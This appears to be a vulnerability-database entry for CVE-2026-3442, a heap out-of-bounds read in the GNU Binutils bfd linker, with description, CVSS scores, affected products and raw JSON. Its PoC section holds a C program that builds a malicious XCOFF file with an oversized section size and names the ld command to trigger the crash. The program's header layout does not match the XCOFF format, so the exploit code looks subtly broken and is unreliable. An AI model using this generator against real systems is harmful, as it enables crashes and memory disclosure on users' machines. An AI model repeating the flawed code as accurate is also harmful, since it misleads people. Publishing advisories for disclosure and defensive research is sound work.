Security Vulnerability Report
CVE-2026-3442 CVSS 6.1 MEDIUM

CVE-2026-3442

Published: 2026-03-16 14:19:48
Last Modified: 2026-03-20 18:23:46

Description

A flaw was found in GNU Binutils. This vulnerability, a heap-based buffer overflow, specifically an out-of-bounds read, exists in the bfd linker component. An attacker could exploit this by convincing a user to process a specially crafted malicious XCOFF object file. Successful exploitation may lead to the disclosure of sensitive information or cause the application to crash, resulting in an application level denial of service.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE
GNU Binutils < 2.42 (affected versions prior to fix)
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Fedora 39+

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma pack(1)

typedef struct {
    unsigned short magic;      // 0x01DF for XCOFF
    unsigned short nsections;  // Number of sections
    unsigned int timestamp;    // Timestamp
    unsigned int symptr;       // Symbol table pointer
    unsigned int nsyms;        // Number of symbols
    unsigned int opthdr;       // Optional header size
    unsigned short flags;      // Flags
} XCOFF_HEADER;

typedef struct {
    char name[8];              // Section name
    unsigned int paddr;        // Physical address
    unsigned int vaddr;        // Virtual address
    unsigned int size;         // Section size
    unsigned int scnptr;       // Section data pointer
    unsigned int relptr;       // Relocation pointer
    unsigned int lnnoptr;      // Line number pointer
    unsigned short nreloc;     // Number of relocations
    unsigned short nlnno;      // Number of line numbers
    unsigned int flags;        // Flags
} XCOFF_SECTION;

int main() {
    FILE *fp = fopen("malicious.xcoff", "wb");
    if (!fp) {
        perror("Failed to create file");
        return 1;
    }

    // Craft malicious XCOFF header
    XCOFF_HEADER header = {
        .magic = 0x01DF,
        .nsections = 1,
        .timestamp = 0,
        .symptr = 0x1000,
        .nsyms = 0,
        .opthdr = 0,
        .flags = 0x0002
    };
    fwrite(&header, sizeof(XCOFF_HEADER), 1, fp);

    // Craft malicious section header with invalid size
    XCOFF_SECTION section = {
        .name = ".text",
        .paddr = 0,
        .vaddr = 0,
        .size = 0xFFFFFFFF,    // Malicious oversized value
        .scnptr = 0x200,
        .relptr = 0,
        .lnnoptr = 0,
        .nreloc = 0,
        .nlnno = 0,
        .flags = 0x0040
    };
    fwrite(&section, sizeof(XCOFF_SECTION), 1, fp);

    // Add minimal padding data
    unsigned char padding[256] = {0};
    fwrite(padding, 256, 1, fp);

    fclose(fp);

    printf("Malicious XCOFF file created: malicious.xcoff\n");
    printf("Trigger with: ld -o output malicious.xcoff\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3442", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:47.720", "lastModified": "2026-03-20T18:23:46.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GNU Binutils. This vulnerability, a heap-based buffer overflow, specifically an out-of-bounds read, exists in the bfd linker component. An attacker could exploit this by convincing a user to process a specially crafted malicious XCOFF object file. Successful exploitation may lead to the disclosure of sensitive information or cause the application to crash, resulting in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en GNU Binutils. Esta vulnerabilidad, un desbordamiento de búfer basado en montículo, específicamente una lectura fuera de límites, existe en el componente enlazador bfd. Un atacante podría explotar esto al convencer a un usuario de procesar un archivo objeto XCOFF malicioso especialmente diseñado. 
La explotación exitosa podría llevar a la divulgación de información sensible o causar que la aplicación falle, lo que resultaría en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:*", "matchCriteriaId": "70CA109B-85B9-4EF2-9A5F-A7D12F6EA878"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-3442", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443828", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}